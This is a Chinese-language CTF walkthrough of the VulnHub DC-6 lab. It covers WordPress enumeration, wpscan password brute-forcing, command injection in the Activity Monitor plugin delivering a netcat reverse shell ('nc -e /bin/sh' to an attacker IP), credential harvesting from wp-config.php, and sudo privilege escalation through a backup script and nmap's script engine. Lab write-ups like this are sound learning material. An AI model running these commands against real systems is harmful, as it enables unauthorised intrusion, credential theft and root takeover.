靶机来源:https://www.vulnhub.com/entry/dc-6,315/
1.扫描(arp-scan和nmap)可以看到靶机开放了两个端口分别是22和80
发现打不开这个网站,分析原因发现URL上并没有显示刚刚输入的靶机IP,而是变成了wordy,那么有可能是本地hosts文件没有解析到这个IP。
所以打开hosts文件绑定靶机IP:
路径为/etc/hosts
修改为:
<靶机IP> wordy
再次打开浏览器访问就可以访问成功了:
发现这个网页使用的是非常经典的WordPress模板,接下来就可以针对网页使用的这个模板进行渗透。
这里得到的信息,可能会是从插件入手:
dirb http://wordy/
发现网站后台登陆界面:http://wordy/wp-admin/
wpscan --url http://wordy/ -e u
得到了五个用户:
admin graham mark sarah jens
现在是想办法登录进网站后台,可以采用爆破的方式进入,并且得到了作者的一条提示:
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt,在命令行中输入在/root目录下得到了一个关键词为k01的密码字典:
将刚刚wpscan爆破出的用户名写进一个名为username的文本文件,作为另一个交互式字典:
设置到之后attack开始爆破,可能会非常慢,打个一两把游戏回来看结果,正确的密码的字长会跟错误的字长不一样,可以这样判断出正确的登录密码,但是这个burp爆破实在太慢了,不好使。
不想打游戏就可以使用wpscan进行爆破,很快,参数要注意:-U <用户名字典> -P <密码字典>
wpscan --url http://wordy -U /root/username.txt -P /root/passwords.txt
爆破得到用户名为mark,和密码为helpdesk01的后台用户
登录进去:
发现一个插件Activity monitor,通过网上查询了一下这个插件的漏洞,好像存在远程命令执行漏洞,详细见这篇博文。于是,转到这个插件的界面,在IP tools中输入127.0.0.1,并点击lookup,同时使用burp进行抓包:
发送到repeator模块中进行重放:
因为得知了这个插件存在命令执行漏洞,所以先试一试简单的命令能不能执行:
发现漏洞的确存在,那么试试直接在这里给kali一个反dshell,
127.0.0.1 | nc -e /bin/sh 192.168.65.128 8888
nc监听8888端口:
nc -lvp 8888
成功拿到反dshell,获取一个交互式的shell:
python -c 'import pty;pty.spawn("/bin/bash")'
先是查看每个wordpress模板都有的一个wp-config.php文件,查看有没有系统用户信息:
得到wpdbuser/meErKatZ,是一个数据库账户
用得到的这个账户登录数据库查看信息:
mysql -uwpdbuser -pmeErKatZ
可以看到五个账户密码都加密过了,无从下手。
随后在目录/home/mark/stuff中发现这了things-to-do.txt:
得到一个用户graham/Gso7issUM1D4
尝试用这个账号登录ssh服务:
ssh [email protected]7.提权
sudo -l查看提权信息:
提示我们jens用户文件下有一个脚本
查看这个脚本cat /home/jens/backups.sh
发现内容tar -czf backups.tar.gz /var/www/html
echo "/bin/bash" >>/home/jens/backups.sh
把/bin/bash写入到backups.sh后面:
cd /home/jens sudo -u jens ./backups.sh
转到jens目录,执行backups.sh 脚本成功转换为jens用户:
发现jens用户可以无密码以root用户权限执行/usr/bin/nmap命令:
echo "os.execute('/bin/bash')" >> root1
sudo nmap --script=root1
这里我不太明白,参考了这篇博客。
cat /root/theflag.txt
这次的提权部分有点困难,做了比较久,而且不太理解
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)